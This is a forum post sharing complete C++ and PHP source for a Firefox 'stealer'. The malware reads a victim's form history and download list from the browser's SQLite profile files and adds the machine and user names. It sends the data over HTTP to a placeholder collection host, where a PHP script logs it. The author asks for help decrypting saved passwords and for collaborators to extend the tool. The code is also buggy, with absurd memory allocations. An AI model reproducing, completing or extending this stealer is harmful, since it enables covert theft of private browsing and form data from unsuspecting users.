[C++ ]Mozilla Stealer Project using WinApi

[Cartman.]

Here is my mozilla firefox stealer, it steals download lists and form history. It can easly be extended and used to steal

other datas from a mozilla firefox. I used sqlite and used a sqlite.lib file which i compiled. I used web based communication.

I generally used WinApi functions.

Datas are sent to a php file and be logged in a server. Please don't forget to give permissions

Thanks JeFF for his help about widestring and ansi-string help.

Thanks frankl3fr6nk for kind beta testing

Thanks icarus for his helps to me about learning malware fundamentals

We can develop this stealer together with peoples who have knowledge about these. For instance

- my first question is how to decrypt to encrypted password

- How to do this code more compatible with other operating systems

- How to reduce the size

I attached sqlite3.h and sqlite3.c and sqlite.lib

config.h

#define HOST "www.xxx.com" // Do not change its format..
#define PORT 80
#define PAGE_NAME "stealer.php" // Do not change its format..

functions.h

#include <Windows.h>
#include <WinInet.h>
#include "config.h"

void Request (const char* server,const char* input);
char* getComputerName();

getFormHistory.h

#include "config.h"
#include "sqlite3.h"

void getFormHistory(char* path);

getDownloads.h

#include "config.h"
#include "sqlite3.h"
void getDownloads(char *path);

functions.cpp

#include "functions.h"

void Request (const char* server,const char* input) 
{
    HINTERNET hInternet;
    HINTERNET hConnect;
    HINTERNET hRequest;

    hInternet = InternetOpenA("Open",INTERNET_OPEN_TYPE_PRECONFIG,NULL,NULL,INTERNET_FLAG_DONT_CACHE);
    if (hInternet != NULL)
	{
		hConnect = InternetConnectA(hInternet,server,PORT,NULL,NULL,INTERNET_SERVICE_HTTP,0,1u);
		if (hConnect != NULL)
		{
			hRequest = HttpOpenRequestA(hConnect,"GET",input,NULL,NULL,0,INTERNET_FLAG_KEEP_CONNECTION,1);
			if (hRequest != NULL)
			{
				HttpSendRequestA(hRequest,"Content-Type: application/x-www-form-urlencoded\r\n",-1L,NULL,0);
			}
		}
	}
	InternetCloseHandle(hInternet);
    InternetCloseHandle(hConnect);
    InternetCloseHandle(hRequest);
}

char* getComputerName()
{
	DWORD computerNameSize = 512;
	char* computerName;
	computerName = (char*)malloc(512*sizeof(char));
	GetComputerNameA(computerName, &computerNameSize);

	DWORD UserNameSize = 512;
	char* userName;
	userName = (char*)malloc(512*sizeof(char));

	GetUserNameA(userName, &UserNameSize);

	char* fullComputerName = (char*)malloc(1024*sizeof(char));
	ZeroMemory(fullComputerName,1024*sizeof(char));
	strcat(fullComputerName,(const char*)computerName);
	strcat(fullComputerName,userName);

	return fullComputerName;
}

getFormHistory.cpp

#include "getFormHistory.h"
#include "functions.h"

void getFormHistory(char* path)
{
	char *zErrMsg = 0;
	int error;
	sqlite3_stmt *res;
	const char *tail;
	char *formhistory;

	char* pathCopy;
	pathCopy = (char*)malloc(256*sizeof(char));
	ZeroMemory(pathCopy,256*sizeof(char));
	strcpy(pathCopy,path);

	strcat(pathCopy,"\\formhistory.sqlite");
	pathCopy[strlen(pathCopy)-(strlen("Default=1")+4)+strlen("\\fomrhistory.sqlite")+1] = '\00';

	sqlite3 *db; // sqlite3 db struct
	error = sqlite3_open(pathCopy, &db);
	if(!error)
	{
		formhistory = (char*)malloc(429496729);
		ZeroMemory(formhistory,429496729);
		sqlite3_prepare_v2(db,"select * from moz_formhistory",1000,&res,&tail);
		if (error == SQLITE_OK)
		{
			while (sqlite3_step(res) == SQLITE_ROW)
			{
				if(strlen(formhistory) > 6000)
					break;
				strcat(formhistory,(char*)sqlite3_column_text(res, 1));
				strcat(formhistory,"--");
				strcat(formhistory,(char*)sqlite3_column_text(res, 2));
				strcat(formhistory,"*-*-*");
			}
		}
	}

	sqlite3_close(db);

	char* computerName;
	computerName = (char*)malloc(1024*sizeof(char));
	ZeroMemory(computerName,1024*sizeof(char));
	computerName = getComputerName();

	char *data;
	data = (char*)malloc(429496729*sizeof(char));
	ZeroMemory(data,429496729*sizeof(char));
	strcpy(data,PAGE_NAME);
	strcat(data,"?computerName=");
	strcat(data,computerName);
	strcat(data,"-formhistory");
	strcat(data,"&formhistory=");
	strcat(data,formhistory);
	Request(HOST,data);
	free(computerName);
	free(formhistory);
}

getDownlaods.cpp

#include "getDownloads.h"
#include "functions.h"

void getDownloads(char *path)
{	
	char *zErrMsg = 0;
	int error;
	sqlite3_stmt *res;
	const char *tail;
	char *downloads;
	char* pathCopy;
	pathCopy = (char*)malloc(256*sizeof(char));
	ZeroMemory(pathCopy,256*sizeof(char));
	strcpy(pathCopy,path);
	strcat(pathCopy,"\\downloads.sqlite");
	pathCopy[strlen(pathCopy)-(strlen("Default=1")+4)+strlen("\\downloads.sqlite")+1] = '\00';

	sqlite3 *db; // sqlite3 db struct
	error = sqlite3_open(pathCopy, &db);
	if(!error)
	{
		downloads = (char*)malloc(429496729);
		ZeroMemory(downloads,429496729);
		sqlite3_prepare_v2(db,"select * from moz_downloads",1000,&res,&tail);
		if (error == SQLITE_OK)
		{
			while (sqlite3_step(res) == SQLITE_ROW)
			{
				strcat(downloads,(char*)sqlite3_column_text(res, 1));
				strcat(downloads,"*-*-*");
			}
		}
	}

	sqlite3_close(db);

	char* computerName;
	computerName = (char*)malloc(1024*sizeof(char));
	ZeroMemory(computerName,1024*sizeof(char));
	computerName = getComputerName();

	char *data;
	data = (char*)malloc(429496729*sizeof(char));
	ZeroMemory(data,429496729*sizeof(char));
	strcpy(data,PAGE_NAME);
	strcat(data,"?computerName=");
	strcat(data,computerName);
	strcat(data,"-downloads");
	strcat(data,"&downloads=");
	strcat(data,downloads);
	Request(HOST,data);
	free(computerName);
	free(downloads);
}

main.cpp

#include <windows.h>
#include "getFormHistory.h"
#include "getDownloads.h"

// Thanks to LeFF from opensc.ws

int main()
{
	HANDLE hFile;
	DWORD  dwBytesRead = 0;
    char ReadBuffer[513] = {0};
	char* appDataStr = (char*)malloc(256*sizeof(char));
	int strSize = ExpandEnvironmentStringsA("%APPDATA%",appDataStr, 256 );
	char* iniFile;
	iniFile = (char*)malloc(512*sizeof(char*));
	ZeroMemory(iniFile,512);
	strcat((char*)appDataStr,"\\Mozilla\\Firefox\\profiles.ini");
	strcat((char*)iniFile,(char*)appDataStr);
	hFile = CreateFileA(iniFile,GENERIC_READ,FILE_SHARE_READ,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL);
	if (hFile != INVALID_HANDLE_VALUE) 
    { 
		ReadFile(hFile, ReadBuffer, 512, &dwBytesRead, NULL);
	}
	CloseHandle(hFile);

	char *pathStart;
	ReadBuffer[dwBytesRead] = '\00';
	pathStart = strstr(ReadBuffer,"Path=");
	pathStart = pathStart + 5*sizeof(char);
	int size = strlen(pathStart)-(strlen("Default=1")+4);
	char *realPath;
	realPath = (char*)malloc(256*sizeof(char));
	ZeroMemory(realPath,256*sizeof(char));
	strncat(realPath,pathStart,size-2); // 4 for \t\n and \t\n


	getDownloads(realPath); // Get downloads
	getFormHistory(realPath); // Get form history
	//each function should keep realPath variable same.

	free(appDataStr);
	free(iniFile);
	return 0;
}

stealer.php

<html>
<body>

<?php
	$downloads = $_GET["downloads"];
	$computerName = $_GET["computerName"];
	$formhistory = $_GET["formhistory"];
	$handle = fopen($computerName, 'a');
	if(isset($downloads))
	{
		$downloads = str_replace("*-*-*","\t\n", $downloads);
		fwrite($handle, $downloads); 
		fwrite($handle, "\t\n\t\n");
		fwrite($handle, "-----downloads done-----\t\n\t\n");
		fclose($handle); 
	}
	else if(isset($formhistory))
	{
		$formhistory = str_replace("*-*-*","\t\n", $formhistory);
		fwrite($handle, $formhistory); 
		fwrite($handle, "\t\n\t\n");
		fwrite($handle, "-----formhistory done-----\t\n\t\n");
		fclose($handle); 
	}
?>

</body>
</html>